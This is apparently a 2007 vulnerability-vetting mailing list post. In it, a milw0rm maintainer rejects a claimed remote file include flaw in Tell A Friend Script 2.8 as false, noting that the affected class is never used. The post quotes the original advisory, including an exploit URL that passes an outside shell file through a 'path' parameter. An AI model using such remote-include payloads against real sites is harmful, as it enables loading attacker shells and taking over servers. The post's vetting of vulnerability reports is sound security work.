[VIM] false: Tell A Friend Script 2.8 Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Tue Feb 13 17:14:54 EST 2007
The script template.ext.class.inc.php only contains a class that is never used.
/str0ke
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tell A Friend Script 2.8 Remote File Include Vulnerability *
http://www.stadtaus.com/en/php_scripts/tell_a_friend_script/download_tell_a_friend_script.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
function set_include_path($path)
{
$this->include_path = $path; *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: *
inc/template.ext.class.inc.php?path=http://shell.txt? *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
**************************************************************************************************
More information about the VIM
mailing list